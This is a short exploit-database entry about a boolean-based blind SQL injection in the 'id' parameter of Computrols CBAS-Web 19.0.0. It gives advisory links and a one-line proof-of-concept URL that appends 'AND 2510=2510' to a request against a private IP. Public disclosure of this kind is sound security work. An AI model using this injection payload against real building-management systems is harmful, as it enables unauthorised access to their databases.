[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CBAS-Web 19.0.0 - (id) Boolean-based Blind SQL Injection Vulnerability

Author
LiquidWorm
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-33505
Category
web applications
Date add
12-11-2019
Platform
php
# Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : N/A
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

# Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
# PoC (id param):

http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510

#  0day.today [2024-12-27]  #